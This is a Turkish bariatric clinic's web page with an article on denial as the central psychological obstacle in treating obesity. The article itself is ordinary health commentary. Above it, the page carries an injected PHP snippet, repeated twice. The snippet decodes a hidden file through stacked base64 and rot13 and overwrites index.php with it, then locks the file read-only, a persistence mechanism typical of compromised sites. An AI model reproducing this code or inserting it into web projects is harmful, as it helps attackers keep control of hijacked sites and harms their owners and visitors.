$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } İnkar Etmek Obezite Problemini Ağırlaştırıyor - İstanbul Obezite Cerrahisi Merkezi

Skip links

İnkar Etmek Obezite Problemini Ağırlaştırıyor

İnkar Etmek Obezite Problemini Ağırlaştırıyor

İnkar Obeziteye Eşlik Eden En Büyük ve Kompleks Psikolojik Sorundur.

İnkar morbid obeziteye eşlik eden temel psikolojik mekanizmadır ve çoğu zaman çözümü en zor olan problemlerdendir. İnkar mekanizmasının karmaşıklığı bariatrik cerrahi uzmanlarını zorlamaktadır. Obez kişiler sıklıkla obez olduklarını kabul etmezler.

Obeziteleri konu edildiğinde de kendi başlarına kilo verebileceklerini ve kilo vermeyle ilgili geçmişleri aksini kanıtlasa da, isteseler bunda başarılı olacaklarını savunurlar. Bir çözüm olarak bariatrik cerrahiyi araştıran obezler arasında bile, obezitenin kendileri dışındaki faktörlerden kaynaklandığı ve aslında aşırı yemedikleri inancı yaygındır.

Değil hastalar, doktorlar arasında bile inkarın bir türü oldukça sık görülmektedir. Hastalar düzenli bir programı izlerlerse kilolarını verebilecekleri ve koruyabilecekleri inancı.. Hatta bu inanç bariatrik profesyoneller arasında farklı bir şekilde, onların gerekli herşeyi yaptığı inancı ve başarısız hasta ile gerilim şeklinde görülmektedir. Bu sorunları daha da komplike hale getiren, hastalar bu inkarları ile yüzleştirildiği zaman suçlanmış hissetmeleri ve sinirlenmeleridir. O nedenle, hastaların eğer sağlıklı olmak istiyorlarsa kiloları için gerekli sorumluluğu baştan kabullenmeleri, profesyonellerin de güçlükler hakkında bilgi edinerek, hastalarıyla sürtüşmek ya da uzaklaşmak yerine, onlara destek vermeye devam etmeleri gerekmektedir. İnkar, obeziteye eşlik eden en büyük psikolojik problemdir. O nedenle biraraya gelerek, obez hastaların tedavisinde teknikler geliştirmeye çaba harcanmalıdır.

David Mahony, Ph.D., ABPP, Bariatric Times

Yorum yaz

Bitnami